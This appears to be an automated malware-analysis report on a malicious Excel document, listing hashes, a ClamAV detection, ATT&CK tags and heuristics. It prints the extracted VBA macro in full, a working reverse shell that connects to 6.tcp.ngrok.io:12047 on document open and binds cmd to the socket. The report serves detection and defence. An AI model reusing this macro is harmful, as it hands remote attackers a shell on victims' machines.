Office (OOXML) malware analysis — malicious · 8c254e295ffc9f07

MALICIOUS

Office (OOXML)

21.5 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-07

MD5: 6fd2efc8ba761b4abd8d63402db97255 SHA-1: a3c299c08b4934e09d4b6433d4fbc4ab1d4be802 SHA-256: 8c254e295ffc9f07f272277cedd4abc6512bc319357f6158dd8dfdc05e5b70e8

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to establish a network connection to '6.tcp.ngrok.io:12047' and likely downloads and executes a second-stage payload. The presence of the AutoOpen macro and the network communication strongly indicate a malicious intent, consistent with a phishing attachment.

Heuristics 4

ClamAV: Doc.Malware.Valyria-10003133-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-10003133-0
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
    Dim success As Boolean
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	6325 bytes
SHA-256: `45634743fac1c7a3d6083f01dcc3a20c7ebd28d8c8409ac40d52b9cdbec4d8d6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Feuil1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" 'START Const ip = "6.tcp.ngrok.io" Const port = "12047" Const INVALID_SOCKET = -1 Const WSADESCRIPTION_LEN = 256 Const SOCKET_ERROR = -1 Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongPtr ai_addr As LongPtr ai_next As LongPtr End Type Private Type STARTUPINFOA cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As String hStdInput As LongPtr hStdOutput As LongPtr hStdError As LongPtr End Type Private Type PROCESS_INFORMATION hProcess As LongPtr hThread As LongPtr dwProcessId As Long dwThreadId As Long End Type Enum af AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32 End Enum Enum sock_type SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5 End Enum Private Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" () Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long) Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long Function revShell() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET Dim pAddrInfo As LongPtr Dim RetVal As Long Dim lastError As Long Dim iRC As Long Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512 RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = af.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0) If (m_ConnSocket = INVALID_SOCKET) Then revShell = False Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If closesocket (m_ConnSocket) revShell = False End If Loop If Not connected Then revShell = False RetVal = closesocket(m_ConnSocket) Call WSACleanup Exit Function End If Dim si As STARTUPINFOA ZeroMemory si, Len(si) si.cb = Len(si) si.dwFlags = &H100 si.hStdInput = m_ConnSocket si.hStdOutput = m_ConnSocket si.hStdError = m_ConnSocket Dim pi As PROCESS_INFORMATION Dim worked As LongPtr Dim test As Long worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi) revShell = worked End Function Public Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127) End Function Private Sub Document_Open() Dim success As Boolean success = revShell() MsgBox ("pwned") End Sub 'END
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	33280 bytes
SHA-256: `5c7dcc43fa0d250d5a9f94998d03808fb6eb13317bb7e2168b9c09e2b35a4a68`
Detection ClamAV: Doc.Malware.Valyria-10003133-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.